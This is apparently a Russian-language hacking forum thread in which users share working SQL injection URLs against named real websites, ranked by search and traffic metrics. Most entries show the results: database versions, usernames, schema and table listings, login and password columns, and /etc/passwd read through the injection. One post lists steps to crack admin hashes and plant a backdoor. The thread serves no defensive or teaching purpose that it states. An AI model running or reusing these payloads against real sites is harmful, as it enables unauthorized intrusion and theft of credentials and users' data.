SQL Инъекции

Тоже поддержу edu-тематикой

ТИЦ == 20, PR == 6, DMOZ == true;

PHP:

http://www.gcu.edu/faculty-bio.php?fid=-777777777777'+union+select+1,2,concat_ws(0x03a,database(),user(),version()),4,5,6,7,8,9,10,11,12--+h

 

Code:

http://amanday.org.ua/bands/detail.php?id=0+union+select+1,2,3,concat_ws(0x3a,login,password),5,6,7+from+user_data--+

http://list.nsklife.ru/?q=catalog&cat=3'and+1=2+union+select+1,version(),3--+

 

Информационный портал Всероссийской олимпиады школьников
PR:5 ТИЦ:325 ALEXA:402071
http://rosolymp.ru//index.php?option=com_myblog&category=acab'+union+select+/*!concat((select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x))*/++--+'

 

PR=4

PR=5

 

Почти как наш отечественный фриланс, лол.

PHP:

http://free-lance.us/index.php?CatId=1+and+(select+1+from(select+count(*),concat(database(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

 

inj:

user-version-data:

load_file:

 

premiumseeds.ru

PHP:

http://premiumseeds.ru/?show=s_cat&id=181+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+

5.1.47-log
Яндекс тИЦ (CY) 0
Alexa Rank 0
Google PageRank (PR) 0
------------------------------------------------------------------------------------
priceinkerala.com

PHP:

http://www.priceinkerala.com/compa.php?id=-235+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--+

5.0.95-community
Яндекс тИЦ (CY) 0
Alexa Rank 0
Google PageRank (PR) 1
-----------------------------------------------------------------------------------
pakwatan.com

PHP:

http://www.pakwatan.com/pakwaan_detail.php?id=50+or+1+group+by+concat((select+user+from+mysql.user()),0x00,floor(rand(0)*2))having+min(0)+or+1--+

5.1.61-community-log
Яндекс тИЦ (CY) 0
Alexa Rank 323,035 -482,975
Google PageRank (PR) 4
-----------------------------------------------------------------------------------
pizzifarm.com

PHP:

http://www.pizzifarm.com/index.php?id=5+or+1+group+by+concat((select+version()),0x00,floor(rand(0)*2))having+min(0)+or+1--+

4.1.20
Яндекс тИЦ (CY) 0
Alexa Rank 8,502,816 +1,801,629
Google PageRank (PR) 2
-----------------------------------------------------------------------------------
npwrinc.com

PHP:

http://www.inpwrinc.com/prcomp.php?id=5'+or+1+group+by+concat((select+user+from+mysql.user),0x00,floor(rand(0)*2))having+min(0)+or+1--+

5.1.31
Яндекс тИЦ (CY) 0
Alexa Rank 23,048,448
Google PageRank (PR) 2
-----------------------------------------------------------------------------------

 

PR == 4;

PHP:

http://www1.plurib.us/?year=-2006+union+select+1,2,concat_ws(0x03a,id,username,password,usertype),4,5,6,7,8,9,10+from+plurib_joomla_prod.jos_users--

 

Гарвард

Тиц 3000
PR 8

13 800 000 страниц в Гугле

PostgreSQL не могу дальше раскрутить.

 

Code:

http://www.strategicvision.com/press_release.php?[COLOR=Red]pr=[/COLOR]39+and+2=1+/*!union*/+/*!select*/+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,3,4,5,6,7,8--

Username: strategi_web@localhost
Version: 5.0.77
Database: strategi_website

Google PR: 4

 

Code:

http://infomedfarmdialog[dot]ru/?module=video_archive&event_id=1+and+0+union+all+select+(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=0x7777776c6f6d6261726430317275)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)--+

User: [email protected]
Database: wwwlombard01ru
Version: 5.1.58-log

PR - 4
CY - 140

 

ТИЦ == 10, PR == 4, AR ==11,040, трафф.

Число зарегистрированных пользователей сайта == 50674

PHP:

http://officialpsds.com/tutorials?begin=7'+union+select+1,2,3,4,count(*),6,7,8+from+users--+h

Число зарегистрированных пользователей форума == 48040

PHP:

http://officialpsds.com/tutorials?begin=7'+union+select+1,2,3,4,count(*),6,7,8+from+_vb_user--+h

 

Крутая ситуация) У тебя скулья с LFI. Инклюдится пятая колонка:

Code:

http://www.azalsigorta.com/?mod=1'+union(select+1,2,3,4[COLOR=Red],0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764[/COLOR])--+f

Результат:

Code:

root:x:0:0:root:/root:/bin/bash 
bin:x:1:1:bin:/bin:/sbin/nologin
....

Где 0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764 это ../../../../../etc/passwd.

UPD.

Code:

http://www.azalsigorta.com/?mod=1'+union(select+1,2,version(),4,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764)--+f

В самом низу

Code:

Fatal error: Class '[COLOR=SandyBrown]5.5.23-55[/COLOR]' not found in /home/azalsigo/public_html/library/core/Core.class.php on line 19

Удачи!

 

PR == 4;

PHP:

http://www.c-registry.us/pages/index.php?pID=77777777'+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3--+h

PR == 3;

PHP:

http://www.deals365.us/category.php?catid=-174+union+select+1,version(),3,4--

 

тИЦ == 10
PR == 1

PHP:

http://ventura.rudtp.ru/articles.php?id=4+union+sele.ct+1,2,3,GROUP_CONCAT(table_name,0x0a)+from+information_schema.  tables+--

 

PHP:

http://www.ubytok.ru/faq?cat_id=1 and 0 union all select 1,2,3,4,5,6,7,8,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=0x617a62756b61737a5f756279746f6b)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),0--

User: azbukasz_ubytok@localhost
Database: azbukasz_ubytok
Version: 5.1.58

PR - 2
CY - 30

PHP:

http://www.crisis.ru/links.php?catid=1'+or+1+group+by+mid(version(),rand(0)|0,64)+having+avg(0)--+

User: bankrot@localhost
Database: bankrot
Version: 5.0.95

PR - 4
CY - 50

 

http://forum.av.by/viewforum.php?f=51&model_id=361+union+select+1+from(select+count(*),concat(version(),floor(rand(0)|0))x+from+information_schema.tables+group+by+2)a+where(1=1)
​

http://forum.av.by/viewforum.php?f=51&model_id=361+union+select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,user_password)from+phpbb_users+limit+1,1),floor(rand(0)|0))x+from+information_schema.tables+group+by+2)a+where(1=1)

1. Login:md5 —> расшифровываем
2. Админка: /admin/
3. Делаем ретрив бд
4. Получаем бекдор в профиле

​

PR: 5
Pages: 4 430 000

CY: 425
Pages: 379 000

DMOZ: Y
Траф: 54 000

 

украинский датинг, жаль народа мало:

 

HTML:

http://sport-lights.ru/dir.php?id=-2+union+select+1,2,3,4,5,6,7,group_concat(schema_name+separator+0x3C62723E),9,10,11+from+information_schema.schemata--

Bases:
information_schema
allrecords
autonews
avtobang
avtobudget
avtoclubber
avtogramma
avtokarton
basket-team
basketblog
biatlonblog
bombnews
club
dating
doyouknow
engfootball
engfutbolist
epigraf
flagi
flashgames
footballblog
francefoot
francefootball
gerfoot
gerfootball
incognita
ingectors
italfoot
italyfootball
kinofreaks
kinopazl
kzu
lyrics
memorygame
netnewsmaker
nobel
poller
relaxat
rossfoot
rusfootball
spainfoot
spainfootball
sportemblem
sportnews
trenerchgk
turkfootball
twichange
ukrfoot
ukrfootball
viktorina

Мне не интересны..

 

etuners.gr/en/index.php?s=13&t=296+UNION+SELECT+1,2,3,concat(user(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+limit+1,1--


nzho.ru/catalog.php?id=137+union+select+1,concat(user(),version()),3,4,5+limit+1,1--


wellydiecast.com/product_list.php?id=1+UNION+SELECT+concat(user(),version())+LIMIT+1,1--


operalane.com/shop.php?item_id=15+union+select+1,(user(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15+limit+1,1--


www.skyproairsoft.com/news_detail.php?id=5+UNION+SELECT+concat%28user%28%29,version%28%29%29,2,3,4+LIMIT+1,1--